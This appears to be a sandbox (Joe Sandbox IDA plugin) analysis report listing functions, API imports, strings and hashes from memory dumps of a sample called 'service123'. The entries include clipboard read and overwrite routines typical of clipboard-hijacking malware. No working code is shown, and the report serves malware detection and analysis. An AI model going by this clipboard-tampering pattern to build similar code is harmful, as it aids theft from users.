Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998de29bb876939440730195eb7f93a70c0d3172adb4f5735600408bb07fb062
Instruction ID: efe5c1469153b998dd35b027b03f9e68a53eb58c84d4f6e1f39988d622fae0e4
Opcode Fuzzy Hash: 998de29bb876939440730195eb7f93a70c0d3172adb4f5735600408bb07fb062
Instruction Fuzzy Hash: 7C51A9B5A0530A8FCB00DF2DD29151AFBF4FF95319B56865DE9588BB00E731E8448FA2

Function 6C2DB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c412d77519d39e56c4ec06fd41e6359616c6b606c761007c44e303a6833bb4f
Instruction ID: 1d1969e7080bc68e782e750158925ea1be2a5d528e615f7c2719e4a768d41b21
Opcode Fuzzy Hash: 4c412d77519d39e56c4ec06fd41e6359616c6b606c761007c44e303a6833bb4f
Instruction Fuzzy Hash: 1D31F4B17153058FDB10AF28C6D264AB7B8FF56318B89426CDE118FB45FB31E4088B62

Non-executed Functions

Function 6C2CCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2CCD7D

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1c66e96980fbdb5b7bc57880b79e170f389fb93126a96e669c43e85bfded02c2
Instruction ID: f950be434f6f0ea72900eb485fd9e19c02e45b06b0d2f341c3abe75004a49f74
Opcode Fuzzy Hash: 1c66e96980fbdb5b7bc57880b79e170f389fb93126a96e669c43e85bfded02c2
Instruction Fuzzy Hash: EB0207716487598FD740CF28C044795FBE2AF46318F0983AEECE857B91C776A449CB82

Function 6C2D0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2D0FCA
strlen.MSVCRT ref: 6C2D0FD4

Strings

!, xrefs: 6C2D2C08
inity, xrefs: 6C2D1E21
5, xrefs: 6C2D14D2
, xrefs: 6C2D240F

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 5b3ad4dbdf4d158ce56d13d0e6900991f2b15c8d6db37f8be0d29ccf3dd37148
Instruction ID: 7fee4e3ae5854cac31dc2cd1424a4747d56c86f8e3750d9763a1d5c0fabe77e5
Opcode Fuzzy Hash: 5b3ad4dbdf4d158ce56d13d0e6900991f2b15c8d6db37f8be0d29ccf3dd37148
Instruction Fuzzy Hash: A2F24AB5A087898FD320CF68C48475ABBF1BF95318F12891DE8D997B50D775E884CB82

Function 6C3484D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

rand_s, xrefs: 6C3486B7
rdrnd, xrefs: 6C348618
Auth, xrefs: 6C3485E7
Auth, xrefs: 6C348676
Genu, xrefs: 6C34866E
Auth, xrefs: 6C34854F
rdseed, xrefs: 6C348518
Genu, xrefs: 6C3485DF
random_device::random_device(const std::string&): unsupported token, xrefs: 6C3486D2
random_device::random_device(const std::string&): device not available, xrefs: 6C348598
Genu, xrefs: 6C348557
default, xrefs: 6C3484EF
hardware, xrefs: 6C3486A0
rdrand, xrefs: 6C3485A8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 0258a01cb1f2f65c0647a0406d75201e3aad8e39489892d9f4aa18d93affd209
Instruction ID: 17677c9c02f19b377ecc1f7cecb94cf0f152e473f9dd3668bb4fbe80d5abf782
Opcode Fuzzy Hash: 0258a01cb1f2f65c0647a0406d75201e3aad8e39489892d9f4aa18d93affd209
Instruction Fuzzy Hash: 454114F26083414BE300AA29C88235A76E2BB4031CF608A7EDC86D6F51D636D555CF93

Function 6C2CEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2CF18B
malloc.MSVCRT ref: 6C2CF1A8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: c0df16e8738e6afa914c6e2a988bf27023fd33d9cec4bf3b54a6c3c65ea14214
Instruction ID: 889b6f9883079adfab2213393577ce469b830e69749373fd154569eca7295751
Opcode Fuzzy Hash: c0df16e8738e6afa914c6e2a988bf27023fd33d9cec4bf3b54a6c3c65ea14214
Instruction Fuzzy Hash: 88125A7570874A8FC350CF18C48065AB7E2BF88758F158A2DECA997B50E734E809CB93

Function 6C2EE6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EE70A
strlen.MSVCRT ref: 6C2EE77A

Strings

basic_string: construction from null is not valid, xrefs: 6C2EE86F, 6C2EE8C0, 6C2EE910
basic_string: construction from null is not valid, xrefs: 6C2EE742, 6C2EE7B2, 6C2EE822

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 1c72bff2f19242aeb8116abbc3e3444c84dc0bcf36094e25d2a116107ca58f84
Instruction ID: f78cbc6fd6d67bdf34fb7f3dce427c540468058c703fa81fee12dda2d09e4968
Opcode Fuzzy Hash: 1c72bff2f19242aeb8116abbc3e3444c84dc0bcf36094e25d2a116107ca58f84
Instruction Fuzzy Hash: 14619CF1A056158FCB00FF28D48189ABBE4BB59218F46496DE8C49B715E231E899CBD2

Function 6C2D9D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3639D0: strlen.MSVCRT ref: 6C3639DE

OpenClipboard.USER32 ref: 6C2D9D31
GlobalAlloc.KERNEL32 ref: 6C2D9D55
GlobalLock.KERNEL32 ref: 6C2D9D72
strcpy.MSVCRT ref: 6C2D9D82
GlobalUnlock.KERNEL32 ref: 6C2D9D8A
EmptyClipboard.USER32 ref: 6C2D9D93
SetClipboardData.USER32 ref: 6C2D9DA4
CloseClipboard.USER32 ref: 6C2D9DAD

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: 861140a759ff1caf2df2a9bdf2a70a36f962d13a2ab34446342e4ebb3214f0fa
Instruction ID: a5d9fa1294f28207c30ee5a46ed9da496becc25f30e817534f953b680b714d70
Opcode Fuzzy Hash: 861140a759ff1caf2df2a9bdf2a70a36f962d13a2ab34446342e4ebb3214f0fa
Instruction Fuzzy Hash: 5111F8B15083098BDB40BF78D6992AEBBF4BF19305F42482DE88687644EF34E418CB53

Function 6C2E0860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2E0886
memcmp.MSVCRT ref: 6C2E08A9
memcmp.MSVCRT ref: 6C2E091F
memcmp.MSVCRT ref: 6C2E0991

Part of subcall function 6C38ADB0: strlen.MSVCRT ref: 6C38ADBE

memcmp.MSVCRT ref: 6C2E0A25

Strings

basic_string::compare, xrefs: 6C2E08C8, 6C2E093C, 6C2E09AF, 6C2E0A44, 6C2E0A60
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2E08D0, 6C2E0944, 6C2E09B7, 6C2E0A4C, 6C2E0A68

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: a822483ddc0024e385311ad43e2a8f966208294c1ec5677099ae3829cb69ba43
Instruction ID: 8f8f9be477e3db17935e39a8ab566221f6ee2997dec4ddb58c7e539c0ca93698
Opcode Fuzzy Hash: a822483ddc0024e385311ad43e2a8f966208294c1ec5677099ae3829cb69ba43
Instruction Fuzzy Hash: DB615575A0A3059FC300EF29C8C045AFBE5AF98788F94892DF988D7724E631E845DF52

Function 6C2D70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2D70C7
memset.MSVCRT ref: 6C2D7217

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: edc2817aa7819d5d5eb24e8ea8b68941fa715df0946955e12b69951d11ccf4ea
Instruction ID: fc5730ee0f4bd5d8b18de0377fdf2e03ab1067eb47f57d81c21a8de798509341
Opcode Fuzzy Hash: edc2817aa7819d5d5eb24e8ea8b68941fa715df0946955e12b69951d11ccf4ea
Instruction Fuzzy Hash: A842D27160834A8FD700CF28C48075AB7E2AF95B09F16891DFC958BB49D779F949CB82

Function 6C2D5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6C2D6D95
, xrefs: 6C2D7074
NaN, xrefs: 6C2D5B5F
Infinity, xrefs: 6C2D5BE0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 75a7bb31acd60ae51580e0470135821bb539a5b44bf9ad8a1f4a77fea9ccc4a2
Instruction ID: c92e7f5e959a1d678760d591e42c356e2ec60f2b4206a720be804a40343dbdd9
Opcode Fuzzy Hash: 75a7bb31acd60ae51580e0470135821bb539a5b44bf9ad8a1f4a77fea9ccc4a2
Instruction Fuzzy Hash: 6FE222B1A093868FD310CF69C08474ABBE0FF99748F168D2EE89597751E775E8448F82

Function 6C2D9E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C2D9E37
GlobalLock.KERNEL32 ref: 6C2D9E49
GlobalUnlock.KERNEL32 ref: 6C2D9E6A
CloseClipboard.USER32 ref: 6C2D9E73
CloseClipboard.USER32 ref: 6C2D9E98

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 64b063ec90698d057f9c0497261562b8c2793bbfc6a852349d95b8ca6bd1b631
Instruction ID: 6115bad696f2385660e54e4103cbdc894400a7d1763bf23f240b295a1c36d29f
Opcode Fuzzy Hash: 64b063ec90698d057f9c0497261562b8c2793bbfc6a852349d95b8ca6bd1b631
Instruction Fuzzy Hash: 7AF031B26086068FEB407F7995581AEBBF4AB49315F05093EEC8697644DF30E41DCB93

Function 006F51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 006F69A4
, xrefs: 006F66C5

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: b139709b4fc9faa606476540c1527b9ebf5bf3c69fde9c239a9c39a59ac468f6
Instruction ID: ff0a9c010377dbd5652422ac7a5c5452908f50ef41980096dcc3a7240fc7f423
Opcode Fuzzy Hash: b139709b4fc9faa606476540c1527b9ebf5bf3c69fde9c239a9c39a59ac468f6
Instruction Fuzzy Hash: 7DE232B1A087458FC710DF29C18076AFBE2BF88744F14891DFA9A97361E775E8458F82

Function 6C2D44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 6C2D46A9
., xrefs: 6C2D47E4
gfff, xrefs: 6C2D45FC
gfff, xrefs: 6C2D4613

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: dc20d6b57053b45ff315622cc472941925e72c29e0401e23cb37db64fc7e1792
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 5AD1B571A1834A8BD700CF29C48474BB7E2AFE5349F1AC52DEC948BB55D770F9498B82

Function 006F3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 006F4114
gfff, xrefs: 006F3F43
gfff, xrefs: 006F3F2C
@, xrefs: 006F3FD9

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 7f3d44470cf38e8e8d50470225034604097eeae242ac49603cb467a44bd9f421
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 4ED19071A0830A8BD714DF29C88037BBBE3AF94344F18C92DEA558B755DB70DD498B92

Function 6C363140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C363250

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: d85f048f07ccd79390e69fc7f6af65aeda97558580fe306ceb43e933a185abaa
Instruction ID: 6e6620af9dbc2e4cb1ea308c84f21bead3a7b08f6a64381498814b0efa49a149
Opcode Fuzzy Hash: d85f048f07ccd79390e69fc7f6af65aeda97558580fe306ceb43e933a185abaa
Instruction Fuzzy Hash: B3416BB29092108FD754DF2ED480A4AFBE4EF99314F15C96EE8988B709D331D845CBA2

Function 6C360730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3607A0
memset.MSVCRT ref: 6C3607C4

Strings

basic_string::_M_replace_aux, xrefs: 6C360840

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 0bd8b85df8223469d1173c321b5eb72c9a28b72e58bc2c68a0bce334dedd435f
Instruction ID: fbe3e62e1594cfd8c08d7733c3e543df91fd422b58e35865f5c2551eba029759
Opcode Fuzzy Hash: 0bd8b85df8223469d1173c321b5eb72c9a28b72e58bc2c68a0bce334dedd435f
Instruction Fuzzy Hash: 32318F75A097908FC300DF29C4C1A2AFFF1AFC6604F14896DE8988BB09D632D844CF96

Function 6C333840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C333898
memcpy.MSVCRT ref: 6C333911

Part of subcall function 6C335590: memcpy.MSVCRT ref: 6C335620

Strings

basic_string::_M_replace_aux, xrefs: 6C3338C0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 343ec4ad71eea4629bc6f3f99cf138f89ac6e018b03ca38553d4670c7d2c4c08
Instruction ID: ee76526f90739b4a2ae4a09e4f44b6ef5079903053c16ceb311915cccd845a58
Opcode Fuzzy Hash: 343ec4ad71eea4629bc6f3f99cf138f89ac6e018b03ca38553d4670c7d2c4c08
